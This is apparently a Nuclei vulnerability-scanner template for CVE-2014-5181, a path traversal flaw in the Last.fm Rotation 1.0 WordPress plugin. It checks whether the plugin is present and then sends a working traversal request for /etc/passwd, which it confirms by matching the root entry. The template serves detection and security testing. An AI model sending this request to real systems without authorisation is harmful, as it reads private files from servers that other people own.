id: CVE-2014-5181 info: name: Last.fm Rotation 1.0 - Path Traversal author: DhiyaneshDK severity: medium description: | Directory traversal vulnerability in lastfm-proxy.php in the Last.fm Rotation (lastfm-rotation) plugin 1.0 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the snode parameter. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2014-5181 cwe-id: CWE-22 epss-score: 0.00845 epss-percentile: 0.82498 cpe: cpe:2.3:a:last.fm_rotation_plugin_project:lastfm-rotation_plugin:1.0:*:*:*:*:wordpress:*:* metadata: vendor: last.fm_rotation_plugin_project product: lastfm-rotation_plugin framework: wordpress tags: wpscan,cve,cve2014,wp-cross-rss,wordpress,wp-plugin,lfi,wp,lastfm-rotation flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body,"/wp-content/plugins/lastfm-rotation/")' - 'status_code == 200' condition: and internal: true - raw: - | GET /wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=/etc/passwd HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a0047304502204ec2c1ec272175f1a216887b21255e30b7579788096bb7e399291f2b3c6beac1022100c569a83ce0b1ea82e5df1fba4314afaac2b46b399779994ac3663a12daf643e0:922c64590222798bb761d5b6d8e72950